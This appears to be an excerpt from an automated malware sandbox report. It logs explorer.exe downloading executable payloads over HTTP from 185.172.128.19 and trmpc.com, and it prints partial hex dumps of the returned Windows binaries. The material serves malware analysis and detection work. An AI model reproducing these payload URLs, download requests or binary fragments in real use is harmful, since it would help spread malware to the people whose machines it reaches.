                                                                                                                                                                    Feb 8, 2024 19:08:48.287255049 CET1286INData Raw: 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 02 00 00 00 b0 00 00 00 04 00 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 88 0e 00 00 00 c0 00 00 00 00 00 00 00 9c 00 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii: `DATAL@BSS.idataP@.tls.rdata@P.reloc
                                                                                                                                                                    Feb 8, 2024 19:08:48.287269115 CET1286INData Raw: 0a 89 51 04 8b 15 38 c4 40 00 89 10 a3 38 c4 40 00 c3 53 56 57 55 51 8b f1 89 14 24 8b e8 8b 5d 00 8b 04 24 8b 10 89 16 8b 50 04 89 56 04 8b 3b 8b 43 08 8b d0 03 53 0c 3b 16 75 14 8b c3 e8 b7 ff ff ff 8b 43 08 89 06 8b 43 0c 01 46 04 eb 16 8b 16
                                                                                                                                                                    Data Ascii: Q8@8@SVWUQ$]$PV;CS;uCCFV;uCF;uUu3Z]_^[@SVWU2C;rlJk;w^;uBCB)C{uD5;r{;u)s&J$+|$+S
                                                                                                                                                                    Feb 8, 2024 19:08:48.287291050 CET1286INData Raw: ff 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 da fc ff ff 8b 04 24 33 d2 89 10 eb 48 8b 6b 08 3b f5 75 3a 3b 7b 0c 7f 35 8b 0c 24 8b d7 8b c5 e8 71 fd ff ff 8b 04 24 83 38 00 74 28 8b 04 24 8b 40 04 01 43 08 8b 04 24 8b 40 04 29 43 0c 83 7b 0c 00 75
                                                                                                                                                                    Data Ascii: L$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW$?4$;s[+L$L@]\$tL$T$&D$D$D$D$|$tT$L@3
                                                                                                                                                                    Feb 8, 2024 19:08:48.287332058 CET1286INData Raw: 40 00 8b 44 90 f4 85 c0 75 10 a1 74 c4 40 00 89 5c 90 f4 89 5b 04 89 1b eb 3a 8b 10 89 43 04 89 13 89 18 89 5a 04 eb 2c 81 fe 00 3c 00 00 7c 0d 8b d6 8b c7 e8 09 ff ff ff 84 c0 75 17 a1 68 c4 40 00 89 1d 68 c4 40 00 8b 10 89 43 04 89 13 89 18 89
                                                                                                                                                                    Data Ascii: @Dut@\[:CZ,<|uh@h@CZ_^[=l@~@=l@}@+l@p@p@3p@3l@SVW<$L$x@<\$u3R;s)GGt$;
                                                                                                                                                                    Feb 8, 2024 19:08:48.287347078 CET1286INData Raw: 90 f8 ff ff 81 e3 fc ff ff 7f 8b c6 03 c3 8b f8 3b 3d 70 c4 40 00 75 2c 29 1d 70 c4 40 00 01 1d 6c c4 40 00 81 3d 6c c4 40 00 00 3c 00 00 7e 05 e8 1f fb ff ff 33 c0 89 45 fc e8 e9 0c 00 00 e9 85 00 00 00 8b 10 f6 c2 02 74 1c 81 e2 fc ff ff 7f 83
                                                                                                                                                                    Data Ascii: ;=p@u,)p@l@=l@<~3Et}@7)xt8tx}@P;@E3ZYYdh"@=2@th@E_^[Y]SVWU}
                                                                                                                                                                    Feb 8, 2024 19:08:48.287362099 CET1286INData Raw: 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75 1a 31 c0 5e 5b c3 5e 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5e 5b c3 90 57 89 c7 88 cd 89 c8 c1
                                                                                                                                                                    Data Ascii: u^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[Wfx_i,@B,@SVWPtQ11F t-tE+tB$tBt20w*9w&Fut|Y12_^[F~[)F
                                                                                                                                                                    Feb 8, 2024 19:08:48.287380934 CET1286INData Raw: 00 00 ff d2 85 c0 0f 84 81 00 00 00 8b 54 24 0c e8 db fe ff ff 89 c2 8b 44 24 04 8b 48 0c 83 48 04 02 53 31 db 56 57 55 64 8b 1b 53 50 52 51 8b 54 24 28 6a 00 50 68 79 2c 40 00 52 e8 53 e5 ff ff 8b 7c 24 28 e8 d2 04 00 00 ff b0 00 00 00 00 89 a0
                                                                                                                                                                    Data Ascii: T$D$HHS1VWUdSPRQT$(jPhy,@RS|$(o_G,@RA_D$@8tr@u@T$SVWUJYqt=9t7H;
                                                                                                                                                                    Feb 8, 2024 19:08:48.287395000 CET1286INData Raw: 53 a1 d0 c3 40 00 50 e8 ca e0 ff ff 89 1d 8c c4 40 00 5b c3 8b c0 8a 0d 30 c0 40 00 8b 05 d0 c3 40 00 84 c9 75 28 64 8b 15 2c 00 00 00 8b 04 82 c3 e8 98 ff ff ff 8b 05 d0 c3 40 00 50 e8 8c e0 ff ff 85 c0 74 01 c3 8b 05 8c c4 40 00 c3 50 e8 7a e0
                                                                                                                                                                    Data Ascii: S@P@[0@@u(d,@Pt@PzttJI|JuBSVtJI|JuBNu^[t#JAPRBXXRH|ZXJtJI|JuB@t
                                                                                                                                                                    Feb 8, 2024 19:08:48.287410021 CET1286INData Raw: 57 6a 00 6a 00 e8 ce db ff ff 8b c8 8b d4 8b c6 e8 1f fc ff ff eb 33 6a 00 6a 00 6a 00 6a 00 53 57 6a 00 6a 00 e8 ae db ff ff 8b e8 8b c6 8b cd 33 d2 e8 fd fb ff ff 6a 00 6a 00 55 8b 06 50 53 57 6a 00 6a 00 e8 8e db ff ff 81 c4 00 08 00 00 5d 5f
                                                                                                                                                                    Data Ascii: Wjj3jjjjSWjj3jjUPSWjj]_^[@SVS]^[SVWU) =}+hD$PV'PjjPD$P"(jjVSjjUjUWVSjj]
                                                                                                                                                                    Feb 8, 2024 19:08:48.287836075 CET1286INData Raw: c9 00 00 00 2d 81 00 00 00 73 02 33 c0 6a 00 6a 00 50 ff 36 e8 79 d6 ff ff 40 0f 84 ad 00 00 00 6a 00 8b d4 6a 00 52 68 80 00 00 00 8d 96 4c 01 00 00 52 ff 36 e8 40 d6 ff ff 5a 48 0f 85 8b 00 00 00 33 c0 3b c2 73 4c 80 bc 06 4c 01 00 00 1a 74 03
                                                                                                                                                                    Data Ascii: -s3jjP6y@jjRhLR6@ZH3;sLLt@jj+P6/@tg6Hu]"F$O:@~tjjt;~t6tuF R:@3^6sFiFLH3@@


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.349721185.172.128.1980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:08:52.872153044 CET189OUTGET /288c47bbc1871b439df19ff4df68f0776.exe HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Host: 185.172.128.19
                                                                                                                                                                    Feb 8, 2024 19:08:53.077152967 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:08:52 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 9104384
                                                                                                                                                                    Last-Modified: Fri, 02 Feb 2024 16:13:27 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "65bd14a7-8aec00"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a7 14 bd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 e2 8a 00 00 08 00 00 00 00 00 00 ae 00 8b 00 00 20 00 00 00 20 8b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 8b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 00 8b 00 4b 00 00 00 00 20 8b 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 e0 8a 00 00 20 00 00 00 e2 8a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 40 05 00 00 00 20 8b 00 00 06 00 00 00 e4 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 8b 00 00 02 00 00 00 ea 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 8b 00 00 00 00 00 48 00 00 00 02 00 05 00 90 ea 8a 00 d0 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 b8 c2 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00 0a 13 06 11 05 11 06 28 0d 00 00 06 11 06 09 28 0f 00 00 06 06 17 58 0a 06 7e 0c 00 00 04 6f 15 00 00 0a 3f 2e ff ff ff 7e 08 00 00 04 26 2a 00 1b 30 02 00 2f 00 00 00 02 00 00 11 02 73 16 00 00 0a 0a 73 17 00 00 0a 0b 06 16 73 18 00 00 0a 0c 08 07 6f 19 00 00 0a de 0a 08 2c 06 08 6f 1a 00 00 0a dc 07 6f 1b 00 00 0a 2a 00 01
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELe @ `@`K @@ H.text `.rsrc@ @@.reloc@@BH'0_~,(,(~,(,(~,(,(~,(,(~,~ Z(~,rprp(&8~o~o~o~o(~,(~rp(,(rpo(+)~r1p(,(rpo(((((X~o?.~&*0/ssso,oo*
                                                                                                                                                                    Feb 8, 2024 19:08:53.077332020 CET1286INData Raw: 10 00 00 02 00 15 00 09 1e 00 0a 00 00 00 00 13 30 06 00 28 00 00 00 03 00 00 11 02 8e 69 8d 1a 00 00 01 0a 16 0b 2b 13 06 07 02 07 91 03 07 03 8e 69 5d 91 61 d2 9c 07 17 58 0b 07 02 8e 69 32 e7 06 2a 36 02 03 28 06 00 00 06 28 01 00 00 2b 2a 0e
                                                                                                                                                                    Data Ascii: 0(i+i]aXi2*6((+**0c (~-s~(+(++ i]XX _(X 2*(!*0w{X _}{
                                                                                                                                                                    Feb 8, 2024 19:08:53.077346087 CET1286INData Raw: dc 16 2a 11 04 2a 00 00 00 01 28 00 00 02 00 1a 00 8a a4 00 0c 00 00 00 00 02 00 12 00 a0 b2 00 0a 00 00 00 00 02 00 0b 00 b3 be 00 0a 00 00 00 00 13 30 01 00 18 00 00 00 0c 00 00 11 72 49 02 00 70 28 12 00 00 06 0a 12 00 28 49 00 00 0a 2c 02 17
                                                                                                                                                                    Data Ascii: **(0rIp((I,**0(JoK(&*06(L(M((L(MYj/&**//(!*lSystem.Re
                                                                                                                                                                    Feb 8, 2024 19:08:53.077361107 CET1286INData Raw: 00 73 00 74 00 32 00 32 00 33 00 72 00 32 00 71 00 66 00 6e 00 78 00 73 00 74 00 32 00 32 00 33 00 72 00 32 00 71 00 66 00 6e 00 78 00 73 00 74 00 32 00 32 00 33 00 72 00 32 00 71 00 66 00 6e 00 78 00 73 00 74 00 32 00 32 00 33 00 72 00 32 00 71
                                                                                                                                                                    Data Ascii: st223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnxst223r2qfnx
                                                                                                                                                                    Feb 8, 2024 19:08:53.077462912 CET1286INData Raw: 4b 07 ce 01 ff 8e 15 2a 70 ee 00 fb ff 11 75 67 89 47 f8 b3 45 cb 00 72 00 32 8b 34 f8 67 05 a2 d5 f9 00 34 81 8b db 46 06 32 7c ea 6a 09 5f b3 3d 05 d6 e7 00 e8 00 78 00 06 1f 1c e0 83 80 32 68 db b1 f2 00 cd 15 29 70 e6 00 e3 85 90 fb 8c ff 24
                                                                                                                                                                    Data Ascii: K*pugGEr24g4F2|j_=x2h)p$Vd'CrOGmt_l[ffna2PVr2(5V]=22d2qji^t\,\P(\bQ\UDX|;tX6fX6.3XjsX
                                                                                                                                                                    Feb 8, 2024 19:08:53.077477932 CET1286INData Raw: f6 0c 27 84 c2 74 00 cd 00 46 12 c4 c2 72 00 32 ff 05 02 8d c7 e7 17 f3 44 57 08 2b c3 54 89 25 8b 77 24 7a c6 75 02 71 5f a5 66 e7 17 f3 44 57 08 2b c3 ba 17 b9 44 17 08 2d c3 fe cc bd cc aa cc a2 cc c2 9a a3 80 74 e9 15 12 32 00 89 ba a2 80 32
                                                                                                                                                                    Data Ascii: 'tFr2DW+T%w$zuq_fDW+D-t2223qg]e`2UPs237aoV*2Yd2tnjxs-73}qUf
                                                                                                                                                                    Feb 8, 2024 19:08:53.077492952 CET1286INData Raw: e2 b2 00 9a b1 15 00 71 a3 42 1f ef 00 90 f9 55 00 74 85 f2 7d 3a 6a 3b e8 0c 0e 32 00 28 e8 df 24 6e 00 fd c0 0e 08 1e 09 da 6d 3c 00 33 59 21 e8 17 0f 71 00 3f 3b a8 74 7f 50 9b 5b 7a 00 32 59 da 50 17 00 72 84 6f c4 05 06 69 b7 23 c8 93 03 19
                                                                                                                                                                    Data Ascii: qBUt}:j;2($nm<3Y!q?;tP[z2YProi#-QbVZ3@r2E9$2b25E{}bQP2Y(e=EO2u5P"qnEwAre+22/r1fyQx2}@2]!
                                                                                                                                                                    Feb 8, 2024 19:08:53.077500105 CET1286INData Raw: 81 8c 00 7b 00 73 83 be 7f 54 89 66 24 35 d9 1e 24 34 c3 d8 00 66 08 6e 74 7e b8 74 00 74 00 f1 dc 37 d0 49 80 72 b8 33 00 71 00 a5 8b 2c 04 5d 00 73 f0 0b 3d 32 00 c2 7f 47 03 af 02 f1 8b 33 04 e5 ec 64 0d 78 00 8c 7f fd 44 16 06 b9 42 37 8b 78
                                                                                                                                                                    Data Ascii: {sTf$5$4fnt~tt7Ir3q,]s=2G3dxDB7xzD\P$9r2BbD\VtM=25$nD$,ZffLdtpfStaT qfx),Z5$b]s&Vv$uKxtI=2G_6$=
                                                                                                                                                                    Feb 8, 2024 19:08:53.077512980 CET1286INData Raw: 3d 32 00 ee 5d 8a dd 77 08 28 dc 3b f8 37 df 98 f6 b7 44 0e 0e 64 53 da f0 0d 00 72 dd 77 f8 28 59 8d 22 98 c3 58 75 9e dd 31 f8 61 83 de 10 ee 5c 56 08 ef 45 79 dd 7a 24 04 0c 12 10 9b 87 48 00 32 83 f6 1c 6d 5b bb c3 fe cc bd cc aa cc a2 cc be
                                                                                                                                                                    Data Ascii: =2]w(;7DdSrw(Y"Xu1a\VEyz$H2m[3xF{fn=raAGdmr2t=s239t8F3rr2-3UtS@3n1@n:
                                                                                                                                                                    Feb 8, 2024 19:08:53.077527046 CET1286INData Raw: e8 f9 3d 6e 00 21 c3 f8 ff 21 8b de 56 b9 f0 d8 0b f9 06 b7 c0 05 02 99 d0 ed c6 7c 3b 06 08 06 f0 6c 5d f1 8b cc 55 f9 ec 64 8b 04 08 55 c0 85 0f fd c0 06 10 ff 0e b7 c9 46 02 cc d1 f1 c6 36 3b 04 0c 14 ec 30 5d bb 8b 8c 55 ff ec b1 3d f2 7a b3
                                                                                                                                                                    Data Ascii: =n!!V|;l]UdUF6;0]U=zrt+hz2sYFu;gHqY#AxhqZhC3(YB;@t;J2`2u$qcp3+t)h2sYFXY]%2 rX[nYeGq9/h,rq
                                                                                                                                                                    Feb 8, 2024 19:08:53.281403065 CET1286INData Raw: 0b 46 05 b1 fb 37 75 63 8b 77 d4 f8 47 06 83 95 08 0d 06 f8 45 a4 89 75 64 01 c0 db 92 6e 00 32 c3 fa ff 33 8b 82 51 29 53 f8 5d 7c 56 65 33 c4 33 cc 89 0f fc 09 1c 8c 10 b7 80 6e 74 71 47 fa 7d 88 83 cd 17 40 ee b0 ff 65 0f b1 77 70 00 66 6a 6d
                                                                                                                                                                    Data Ascii: F7ucwGEudn23Q)S]|Ve33ntqG}@ewpfjm)Ms-=rX@+nY=23qnxAu2h1qSqxW82dV'V0x`h62m2V saB2uThlxVb82!P6P>s


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.349733186.147.159.14980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:03.590334892 CET162OUTGET /check/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Host: trmpc.com
                                                                                                                                                                    Feb 8, 2024 19:09:04.130641937 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.24.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:03 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Description: File Transfer
                                                                                                                                                                    Content-Disposition: attachment; filename=ec6b78d6.exe
                                                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                                                    Expires: 0
                                                                                                                                                                    Cache-Control: must-revalidate
                                                                                                                                                                    Pragma: public
                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 a1 83 dd b2 c0 ed 8e b2 c0 ed 8e b2 c0 ed 8e dd b6 46 8e a7 c0 ed 8e dd b6 73 8e a1 c0 ed 8e dd b6 47 8e ea c0 ed 8e bb b8 7e 8e b7 c0 ed 8e b2 c0 ec 8e d1 c0 ed 8e dd b6 42 8e b3 c0 ed 8e dd b6 77 8e b3 c0 ed 8e dd b6 70 8e b3 c0 ed 8e 52 69 63 68 b2 c0 ed 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 11 7c c2 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 28 02 00 00 34 7b 02 00 00 00 00 ac 14 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 7d 02 00 04 00 00 d7 60 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 68 02 00 3c 00 00 00 00 50 7d 02 30 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 65 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e2 26 02 00 00 10 00 00 00 28 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 31 00 00 00 40 02 00 00 32 00 00 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 85 7a 02 00 80 02 00 00 1e 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 6f 66 69 00 00 00 7c 00 00 00 00 10 7d 02 00 02 00 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 cd 09 00 00 00 20 7d 02 00 0a 00 00 00 7e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 68 6f 70 65 62 0c 00 00 00 00 30 7d 02 00 02 00 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6a 69 64 65 78 69 00 00 04 00 00 00 40 7d 02 00 04 00 00 00 8a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 1c 00 00 00 50 7d 02 00 1e 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$FsG~BwpRichPEL|c(4{@@p}`$h<P}0Xe@.text&( `.rdata1@2,@@.dataz^@.rofi|}|@.tls }~@.rehopeb0}@@.jidexi@}@.rsrc0P}@@
                                                                                                                                                                    Feb 8, 2024 19:09:04.130960941 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d9 ee d9 fe c3 cc cc cc cc cc cc cc cc cc cc cc d9 ee 83 ec
                                                                                                                                                                    Data Ascii: $#e%@B%@B%@B%@B%@B%@B%@B%@B% @B%$@B%(@B%,@B%0@B%4@B%8@B%<@B%@@B%D@B%H@B%L@B%P@B%T@B%X@B%\@B%`
                                                                                                                                                                    Feb 8, 2024 19:09:04.130976915 CET324INData Raw: b4 9e 42 00 89 15 b0 9e 42 00 89 1d ac 9e 42 00 89 35 a8 9e 42 00 89 3d a4 9e 42 00 66 8c 15 d0 9e 42 00 66 8c 0d c4 9e 42 00 66 8c 1d a0 9e 42 00 66 8c 05 9c 9e 42 00 66 8c 25 98 9e 42 00 66 8c 2d 94 9e 42 00 9c 8f 05 c8 9e 42 00 8b 45 00 a3 bc
                                                                                                                                                                    Data Ascii: BBB5B=BfBfBfBfBf%Bf-BBEBEBEBBBBBBBB@BBj+Yj@BhAB@B=BujYh@BP@B
                                                                                                                                                                    Feb 8, 2024 19:09:04.131422997 CET1286INData Raw: c3 83 c0 08 c3 e8 46 15 00 00 85 c0 75 06 b8 7c 81 42 00 c3 83 c0 0c c3 8b ff 55 8b ec 56 e8 e2 ff ff ff 8b 4d 08 51 89 08 e8 82 ff ff ff 59 8b f0 e8 bc ff ff ff 89 30 5e 5d c3 8b ff 55 8b ec e8 0b 15 00 00 85 c0 75 05 6a 0c 58 5d c3 e8 9f ff ff
                                                                                                                                                                    Data Ascii: Fu|BUVMQY0^]UujX]M3]UVuujXz3^]UujX]lM3]UVuujXG3^]jhjD@B3B5B@B%
                                                                                                                                                                    Feb 8, 2024 19:09:04.285675049 CET1286INData Raw: 00 a3 08 a1 42 00 8a 45 10 a2 04 a1 42 00 83 7d 0c 00 0f 85 a0 00 00 00 ff 35 6c 05 bd 02 8b 35 ac 40 42 00 ff d6 8b d8 89 5d d0 85 db 74 68 ff 35 68 05 bd 02 ff d6 8b f8 89 7d d4 89 5d dc 89 7d d8 83 ef 04 89 7d d4 3b fb 72 4b e8 85 0e 00 00 39
                                                                                                                                                                    Data Ascii: BEB}5l5@B]th5h}]}};rK9t;r>7r5l5h9]u9Et]]E}]EAB}ABsEtEEAB}ABsEtEE }u)B
                                                                                                                                                                    Feb 8, 2024 19:09:04.286077976 CET1286INData Raw: 50 50 50 e8 02 11 00 00 56 e8 43 24 00 00 40 59 83 f8 3c 76 2a 56 e8 36 24 00 00 8d 04 45 cc a0 42 00 8b c8 2b ce 6a 03 d1 f9 68 8c 4b 42 00 2b d9 53 50 e8 4c 23 00 00 83 c4 14 85 c0 75 bd 68 84 4b 42 00 be 14 03 00 00 56 57 e8 bf 22 00 00 83 c4
                                                                                                                                                                    Data Ascii: PPPVC$@Y<v*V6$EB+jhKB+SPL#uhKBVW"uVW"uh h8KBW(!^SSSSSyj@B;tFtA3Gf9Gt@=rSPP]J YPPV@BM_^3[j#
                                                                                                                                                                    Feb 8, 2024 19:09:04.286536932 CET1286INData Raw: 74 12 49 85 d2 74 04 c6 02 5c 42 ff 07 85 c9 75 f1 89 55 0c 8a 06 84 c0 74 55 83 7d fc 00 75 08 3c 20 74 4b 3c 09 74 47 85 db 74 3d 0f be c0 50 85 d2 74 23 e8 82 22 00 00 59 85 c0 74 0d 8a 06 8b 4d 0c ff 45 0c 88 01 46 ff 07 8b 4d 0c 8a 06 ff 45
                                                                                                                                                                    Data Ascii: tIt\BuUtU}u< tK<tGt=Pt#"YtMEFME_"YtFUFVtBUME^[t US3VW9pu)h8BVS<B@Bx5B;tE8uuUEPSS}E
                                                                                                                                                                    Feb 8, 2024 19:09:04.287075043 CET1286INData Raw: 15 18 41 42 00 8b f0 85 f6 75 1b ff 35 44 a8 42 00 ff 15 ac 40 42 00 8b f0 56 ff 35 c4 81 42 00 ff 15 1c 41 42 00 8b c6 5e c3 8b ff 55 8b ec ff 75 0c ff 75 08 ff 35 48 a8 42 00 ff 15 ac 40 42 00 ff d0 5d c2 08 00 a1 c0 81 42 00 83 f8 ff 74 16 50
                                                                                                                                                                    Data Ascii: ABu5DB@BV5BAB^Uuu5HB@B]BtP5LB@BBBtP ABBjheBhLB@BuF\KBf3G~~pCKCFhBjYevh$ABE>jY}
                                                                                                                                                                    Feb 8, 2024 19:09:04.287565947 CET1286INData Raw: bf 4e e6 40 bb bb 00 00 ff ff 3b c7 74 0d 85 c3 74 09 f7 d0 a3 08 80 42 00 eb 65 56 8d 45 f8 50 ff 15 38 41 42 00 8b 75 fc 33 75 f8 ff 15 34 41 42 00 33 f0 ff 15 28 41 42 00 33 f0 ff 15 24 40 42 00 33 f0 8d 45 f0 50 ff 15 30 41 42 00 8b 45 f4 33
                                                                                                                                                                    Data Ascii: N@;ttBeVEP8ABu3u4AB3(AB3$@B3EP0ABE3E3;uO@uG5B5B^_[%XUEPB]U(B3ES]WtSYjLjPN#0
